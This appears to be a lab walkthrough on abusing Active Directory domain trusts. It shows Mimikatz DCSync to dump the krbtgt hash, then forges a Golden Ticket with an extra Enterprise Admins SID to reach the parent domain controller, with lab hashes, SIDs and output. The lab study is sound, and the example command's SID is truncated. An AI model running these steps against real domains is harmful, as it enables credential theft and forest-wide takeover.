Domain Trusts
The Key Concept of Exploiting Domain Trusts is if we take control over the Root Domain we will be in a Position to Compromise all of Regional Domains.
Domain Trusts
are a Mechanism for Users in the Network to gain access to other resources in the Domain.
For the most part, trusts outline how the Domain's inside of a Forest Communicate with each other. In some Environments, trusts can be extended out to External Domains and even Forests in some cases. (Forest is a Collection of one or more Domain Trees inside an AD Network)
There are Two main Types of Trusts that can be Configured between Domains:
Directional
- The Direction of the Trust flows from a Trusting Domain to a Trusted DomainTransitive
- The Trust Relationship expands beyond just two Domains to include other Trusted Domains
KRBTGT and Golden Tickets
Administrators
KRBTGT
is the account used for Microsoft's implementation of Kerberos. This account acts as the Service Account for the Kerberos Distribution Center
(KDC) Service, which handles all Kerberos Ticket Requests. This Account is used to Encrypt and sign all Kerberos Tickets for the Domain. Since the Password Hash is shared by all Domain Controllers, they can then Verify the Authenticity of the received TGT when Users Request access to Resources.
If we want to Generate our own TGT's to grant us Access to everything, this is known as a Golden Ticket
Attack. In a Golden Ticket Attack, we bypass the KDC altogether and create our own TGT's, essentially becoming a Ticket Granting Server (TGS).
In order to forge TGT's, we need the following Information:
- FQDN of the Domain
- Security Identifier (SID) of the domain
- Username of the Account we want to Impersonate
KRBTGT
Password Hash
KRBTGT
Requires a Domain Compromise since the KRBTGT Password Hash
is only stored on Domain Controllers- Mimikatz
- Output
privilege::debug
lsadump::dcsync /user:za\krbtgt
[DC] 'za.adobe.loc' Will be the Domain
[DC] 'THMDC.za.adobe.loc' Will be the DC Server
[DC] 'za\krbtgt' Will be the User Account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/25/2022 6:18:22 PM
Object Security ID : S-1-5-21-3885271727-2693558621-2658995185-502
Object Relative ID : 502
Credentials:
Hash NTLM: 16f9af38fca3ada405386b3b57366082
ntlm- 0: 16f9af38fca3ada405386b3b57366082
lm - 0: 35c7b671efe40860dc078afd2786c902
[...]
Inter-Realm TGT's
Using the KRBTGT Password Hash
, we could now forge a Golden Ticket
to access any Resource in the Child Domain.
We can take this a step further by forging an Inter-Realm TGT
. Inter-Realm TGT's are used to provide access to resources in other Domains. (Like Exploiting the Bidirectional trust Relationship between the Child and Parent Domain to gain full Access to the Parent Domain)
To do this we need to include extra account SID's from other Domains when we construct the Golden Ticket to perform this Exploit.
We will Exploit the Trust the Parent Domain has with our Child Domain by adding the SID of the Enterprise Admins
(EA) group as an extra SID to our forged Ticket for the Domain Controller of the Child Domain. The EA Group belongs to the Parent Domain and Membership to this Group essentially grants Administrative Privileges over the entire Forest.
To exploit this, we need to recover two SID's:
- SID of the
Child Domain Controller
(In this Scenario THMDC), which we will Impersonate in our forged TGT - SID of the Enterprise Admins in the Parent Domain, which we will add as an extra SID to our forged TGT
- PSH
- Get-ADComputer
- Get-ADGroup
# Name of the Child Domain Controller [In this Scenario THMDC]
Get-ADComputer -Identity "THMDC"
# Recover the SID of the Enterprise Admins Group to Query the Parent Domain Controller [In this Scenario thmrootdc.adobe.loc]
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.adobe.loc
DistinguishedName : CN=THMDC,OU=Domain Controllers,DC=za,DC=adobe,DC=loc
DNSHostName : THMDC.za.adobe.loc
Enabled : True
Name : THMDC
ObjectClass : computer
ObjectGUID : bd651750-782b-4b09-93b4-b5987ec7311b
SamAccountName : THMDC$
SID : S-1-5-21-3885271727-2693558621-2658995185-1001
UserPrincipalName :
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=adobe,DC=loc
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : a23ae384-16e8-44d5-9b36-8173c4e0e5de
SamAccountName : Enterprise Admins
SID : S-1-5-21-3330634377-1326264276-632209373-519
Exploiting Domain Trusts
We can use Mimikatz
to generate the Golden Ticket.
- Mimikatz
- Output
privilege::debug
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password Hash of krbtgt User> /sids:<SID of Enterprise Admins Group> /ptt
:: Query Example in this Scenario
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-63
User : Administrator
Domain : za.adobe.loc (ZA)
SID : S-1-5-21-3885271727-2693558621-2658995185-1001
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3330634377-1326264276-632209373-519 ;
ServiceKey: 16f9af38fca3ada405386b3b57366082 - rc4_hmac_nt
Service : krbtgt
Lifetime : 1/12/2023 12:09:18 AM ; 1/9/2033 12:09:18 AM ; 1/9/2033 12:09:18 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ za.adobe.loc' Successfully submitted for Current Session.
Verifying the Access
First, we will Verify that this Ticket works for access to THMDC since it is a Valid Ticket for the Administrator User of the Child Domain. This is going to Confirm that the Golden Ticket was forged for access to the Child DC.
We can also Verify that the Tickets were correctly Injected with the Windows Built-In Command klist
.
:: List Target Machine Contents
dir \\thmdc.za.adobe.loc\c$
:: Displays a list of currently Cached Kerberos Tickets
klist
If we specified extra SID's we should also now have Access to the Parent DC.
:: List Target Machine Contents
dir \\thmrootdc.adobe.loc\c$\